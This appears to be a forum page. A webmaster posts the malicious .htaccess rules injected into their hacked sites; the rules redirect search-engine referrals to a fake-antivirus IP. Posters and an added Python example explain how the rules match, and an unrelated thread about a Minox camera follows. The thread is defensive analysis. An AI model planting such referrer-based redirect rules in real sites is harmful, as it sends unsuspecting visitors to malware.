My websites were hacked. .htaccess files were added that read:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* ht tp://89.28.13.202/in.html?s=ix [R,L]
The way I discovered this is that certain form POST operations would be redirected to a fake antivirus website. I've removed the .htaccess files and changed my passwords, but I've got a couple questions:
1) Could someone have hacked in without the password? I'm pretty sure the permissions were set to 644. Seems like if they had the password, way more damage would have been done.
2) What are the redirects doing? The last one is the IP address of the fake antivirus site, but what's with all the lines before that? And what do the letters in square brackets mean?
I put a space in the http of the last line to prevent the buffista autolinkafication
OK, did a little research and I *think* it's checking to see if the referring URL is from any of those six websites. If it is, it redirects to 89.28.13.202.
So why would it redirect users after certain POSTing of forms?
OK, did a little research and I *think* it's checking to see if the referring URL is from any of those six websites. If it is, it redirects to 89.28.13.202.
I was just doing the same research (I don't speak mod_rewrite fluently) and came to the same conclusion.
Dunno about the POST issue, though.
It's a good thing it *did* redirect after those POSTS, or I might not have noticed for a good while!
Got it! The referring URL has a parameter task=whatever, e.g. ht tp://mysite.com?task=edit
The condition in the fifth line is matching "ask".
Still need to figure out how they hacked the .htaccess files, but at least the smaller mystery is solved.
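Added example, not part of the thread and not any poster's code: a small Python model of how mod_rewrite evaluates the six RewriteCond lines quoted above, showing why an unanchored `.*ask.*$` test on the Referer also fires for a same-site URL carrying `task=edit`. The function names and the sample Referer values are constructed for illustration.

```python
import re

# RewriteCond lines copied from the injected .htaccess quoted in the thread.
# Flags: NC = case-insensitive match, OR = "or" with the next condition.
# (On the RewriteRule, R = send an external redirect, L = last rule.)
HTACCESS = """\
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
"""

COND_RE = re.compile(
    r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)(?:\s+\[([^\]]*)\])?\s*$", re.I)


def parse_conds(text):
    """Return [(pattern, {flags})] for every Referer condition in text."""
    conds = []
    for line in text.splitlines():
        m = COND_RE.match(line)
        if m:
            flags = {f.strip().upper() for f in (m.group(2) or "").split(",")}
            conds.append((m.group(1), flags - {""}))
    return conds


def matched_patterns(conds, referer):
    """Patterns that match this Referer value (NC honoured)."""
    return [p for p, fl in conds
            if re.search(p, referer, re.I if "NC" in fl else 0)]


def rule_fires(conds, referer):
    """Conditions are ANDed, except that [OR] chains one to the next."""
    group_ok = False
    for pattern, flags in conds:
        group_ok |= bool(matched_patterns([(pattern, flags)], referer))
        if "OR" not in flags:      # end of an OR-group
            if not group_ok:
                return False
            group_ok = False
    return True


CONDS = parse_conds(HTACCESS)
# Constructed Referer values, not taken from any real log.
for ref in ("http://www.google.com/search?q=x",
            "http://mysite.com?task=edit",
            "http://mysite.com/contact"):
    print(ref, rule_fires(CONDS, ref), matched_patterns(CONDS, ref))
```

The second Referer triggers the rule only through the `.*ask.*$` condition, because the pattern is matched anywhere in the whole Referer string rather than against the hostname.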
The answer is probably on your access_log, Jon.
Xposty from Bitches, but I think it's neat.
So my aunt lives in a senior's residence. They have a table for discarded things the owners don't want or if a sad passing has happened, relatives sometimes leave odds and ends there.
My cousin Steve said that his mom noted an old digital camera there and he picked it up and brought it to me because he couldn't figure out how to work it.
I took one look at it and said, "This is not a digital camera. It's a film camera." He pointed out to me something he said was a port, but I recognized as a flash port. I also decided I had seen one before. The case was leather and very old, and the camera was sleek aluminum.
We were going out and about so I took it with me to the stores, and then to lunch. After lunch I took it out and yes, there was no mistaking it as a tiny film camera. It had ASA speeds up to 400 and shutter speeds up to 1/1000. It also had a light meter, and distance markings from 8 inches to infinity.
I have subsequently ID'd it as a Minox model B, the preferred camera of spies and spy flicks for over 70 years.
I hope he lets me keep it....
Very neat. Can you still get film for it?
Yes, so far $10 for 36 exposure cartridges. Pan or color.